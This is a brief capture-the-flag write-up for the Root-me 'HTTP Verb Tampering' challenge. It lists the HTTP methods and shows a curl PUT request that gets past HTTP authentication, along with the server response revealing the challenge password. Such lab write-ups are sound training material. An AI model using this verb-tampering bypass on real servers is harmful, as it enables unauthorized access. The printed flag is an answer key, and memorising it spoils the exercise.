Rootme HTTP Verb Tampering
Root-me
HTTP Verb Tampering
HTTP authentication
The statement is “Bypass the security establishment”
The title talks about HTTP Verbs. The http verbs are:
- POST
- GET
- PUT
- PATCH
- DELETE
- HEAD
- TRACE
- OPTIONS
After trying them the one we need is PUT
curl -X PUT http://challenge01.root-me.org/web-serveur/ch8/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
</head>
<h1>Mot de passe / password : a23e$dme96d3saez$$prap</h1>
</body></html>